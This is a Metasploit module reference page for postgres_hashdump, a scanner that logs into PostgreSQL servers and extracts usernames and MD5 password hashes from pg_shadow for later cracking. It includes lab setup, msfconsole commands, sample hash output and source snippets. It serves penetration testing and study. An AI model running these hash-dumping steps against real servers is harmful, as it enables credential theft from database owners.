Postgres Password Hashdump - Metasploit
This page contains detailed information about how to use the auxiliary/scanner/postgres/postgres_hashdump metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Postgres Password Hashdump
Module: auxiliary/scanner/postgres/postgres_hashdump
Source code: modules/auxiliary/scanner/postgres/postgres_hashdump.rb
Disclosure date: -
Last modification time: 2017-07-24 06:26:21 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: postgres
Target network port(s): 5432
List of CVEs: -
This module extracts the usernames and encrypted password hashes from a Postgres server and stores them for later cracking.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
This module is a scanner module, and is capable of testing against multiple hosts.
msf > use auxiliary/scanner/postgres/postgres_hashdump
msf auxiliary(postgres_hashdump) > show options
... show and set options ...
msf auxiliary(postgres_hashdump) > set RHOSTS ip-range
msf auxiliary(postgres_hashdump) > exploit
Other examples of setting the RHOSTS option:
Example 1:
msf auxiliary(postgres_hashdump) > set RHOSTS 192.168.1.3-192.168.1.200
Example 2:
msf auxiliary(postgres_hashdump) > set RHOSTS 192.168.1.1/24
Example 3:
msf auxiliary(postgres_hashdump) > set RHOSTS file:/tmp/ip_list.txt
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
Description
This module is used to access the password hashes in use within a PostgreSQL database.
This occurs via the PostgreSQL API, which by default runs on port 5432.
Access to the pg_shadow
system catalog is usually restricted to database superusers only.
Vulnerable Application
Installation of PostgreSQL on Kali Linux:
While many versions of Kali Linux come with a PostgreSQL installation out of the box, in the event that you are using a containerized Kali Linux or other minimal installation, installation and setup of PostgreSQL is required.
The following instructions assume you are beginning with a fresh Kali installation as the root user.
apt-get update
apt-get install postgresql
systemctl start postgresql
At this point, PostgreSQL is installed and the installation has created the necessary user accounts to run the server.
This is where most users would begin the verification process. At this point, we'll setup a user account for use within the postgres_hashdump
module
sudo --login --user postgres
psql
CREATE USER msf_documentation_superuser WITH SUPERUSER PASSWORD 'msf_documentation_superuser'
Verification Steps
use auxiliary/scanner/postgres/postgres_hashdump
set RHOSTS [ips]
set RPORT [port]
set USERNAME [username]
set PASSWORD [password]
run
Scenarios
PostgreSQL 10.4 on Kali Linux
msf > use auxiliary/scanner/postgres/postgres_hashdump
msf auxiliary(scanner/postgres/postgres_hashdump) > set RHOSTS 10.10.10.25
RHOSTS => 10.10.10.25
msf auxiliary(scanner/postgres/postgres_hashdump) > set USERNAME msf_documentation_superuser
USERNAME => msf_documentation_superuser
msf auxiliary(scanner/postgres/postgres_hashdump) > set PASSWORD msf_documentation_superuser
PASSWORD => msf_documentation_superuser
msf auxiliary(scanner/postgres/postgres_hashdump) > run
[+] Query appears to have run successfully
[+] Postgres Server Hashes
======================
Username Hash
-------- ----
msf md5b08431efa0cd58b024f3af4acd6b9057
msf_documentation_superuser md5e7ce29c6b3acd4d39bec5e527da21aba
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Confirming
postgresql
# sudo --login --user postgres psql
psql (10.4 (Debian 10.4-2))
Type "help" for help.
postgres=# SELECT usename, passwd FROM pg_shadow;
usename | passwd
-----------------------------+-------------------------------------
postgres |
msf | md5b08431efa0cd58b024f3af4acd6b9057
msf_documentation_superuser | md5e7ce29c6b3acd4d39bec5e527da21aba
(4 rows)
Go back to menu.
Msfconsole Usage
Here is how the scanner/postgres/postgres_hashdump auxiliary module looks in the msfconsole:
msf6 > use auxiliary/scanner/postgres/postgres_hashdump
msf6 auxiliary(scanner/postgres/postgres_hashdump) > show info
Name: Postgres Password Hashdump
Module: auxiliary/scanner/postgres/postgres_hashdump
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
theLightCosine <[email protected]>
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
DATABASE postgres yes The database to authenticate against
PASSWORD postgres no The password for the specified username. Leave blank for a random password.
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 5432 yes The target port
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME postgres yes The username to authenticate as
Description:
This module extracts the usernames and encrypted password hashes
from a Postgres server and stores them for later cracking.
Module Options
This is a complete list of options available in the scanner/postgres/postgres_hashdump auxiliary module:
msf6 auxiliary(scanner/postgres/postgres_hashdump) > show options
Module options (auxiliary/scanner/postgres/postgres_hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
DATABASE postgres yes The database to authenticate against
PASSWORD postgres no The password for the specified username. Leave blank for a random password.
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 5432 yes The target port
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME postgres yes The username to authenticate as
Advanced Options
Here is a complete list of advanced options supported by the scanner/postgres/postgres_hashdump auxiliary module:
msf6 auxiliary(scanner/postgres/postgres_hashdump) > show advanced
Module advanced options (auxiliary/scanner/postgres/postgres_hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
ShowProgress true yes Display progress messages during a scan
ShowProgressPercent 10 yes The interval in percent that progress should be shown
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the scanner/postgres/postgres_hashdump module can do:
msf6 auxiliary(scanner/postgres/postgres_hashdump) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the scanner/postgres/postgres_hashdump auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(scanner/postgres/postgres_hashdump) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
A Connection Error Occurred
Here is a relevant code snippet related to the "A Connection Error Occurred" error message:
51: credential_data.merge!(service_data)
52:
53: # Error handling routine here, borrowed heavily from todb
54: case res.keys[0]
55: when :conn_error
56: print_error("A Connection Error Occurred")
57: return
58: when :sql_error
59: # We know the credentials worked but something else went wrong
60: credential_core = create_credential(credential_data)
61: login_data = {
<RHOST>:<RPORT> Postgres - Insufficient permissions.
Here is a relevant code snippet related to the "<RHOST>:<RPORT> Postgres - Insufficient permissions." error message:
66: login_data.merge!(service_data)
67: create_credential_login(login_data)
68:
69: case res[:sql_error]
70: when /^C42501/
71: print_error "#{datastore['RHOST']}:#{datastore['RPORT']} Postgres - Insufficient permissions."
72: return
73: else
74: print_error "#{datastore['RHOST']}:#{datastore['RPORT']} Postgres - #{res[:sql_error]}"
75: return
76: end
<RHOST>:<RPORT> Postgres - <RES:SQL_ERROR>
Here is a relevant code snippet related to the "<RHOST>:<RPORT> Postgres - <RES:SQL_ERROR>" error message:
69: case res[:sql_error]
70: when /^C42501/
71: print_error "#{datastore['RHOST']}:#{datastore['RPORT']} Postgres - Insufficient permissions."
72: return
73: else
74: print_error "#{datastore['RHOST']}:#{datastore['RPORT']} Postgres - #{res[:sql_error]}"
75: return
76: end
77: when :complete
78: credential_core = create_credential(credential_data)
79: login_data = {
Go back to menu.
Related Pull Requests
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #7200 Merged Pull Request: Rex::Ui::Text cleanup
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #5059 Merged Pull Request: Yard doc corrections
- #4871 Merged Pull Request: Feature/msp 12244/postgres pass the hash
- #2525 Merged Pull Request: Change module boilerplate
- #1228 Merged Pull Request: MSFTIDY cleanup #1 - auxiliary
Go back to menu.
See Also
Check also the following modules related to this module:
- auxiliary/admin/postgres/postgres_readfile
- auxiliary/admin/postgres/postgres_sql
- auxiliary/scanner/postgres/postgres_dbname_flag_injection
- auxiliary/scanner/postgres/postgres_login
- auxiliary/scanner/postgres/postgres_schemadump
- auxiliary/scanner/postgres/postgres_version
- auxiliary/server/capture/postgresql
- exploit/linux/postgres/postgres_payload
- exploit/multi/postgres/postgres_copy_from_program_cmd_exec
- exploit/multi/postgres/postgres_createlang
- exploit/windows/postgres/postgres_payload
- auxiliary/gather/ldap_hashdump
- auxiliary/scanner/mssql/mssql_hashdump
- auxiliary/scanner/mysql/mysql_authbypass_hashdump
- auxiliary/scanner/mysql/mysql_hashdump
- auxiliary/scanner/oracle/oracle_hashdump
- post/aix/hashdump
- post/android/gather/hashdump
- post/bsd/gather/hashdump
- post/linux/gather/hashdump
- post/osx/gather/hashdump
- post/solaris/gather/hashdump
- post/windows/gather/credentials/domain_hashdump
- post/windows/gather/credentials/mcafee_vse_hashdump
- post/windows/gather/credentials/mssql_local_hashdump
- post/windows/gather/hashdump
- post/windows/gather/smart_hashdump
Authors
- theLightCosine
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.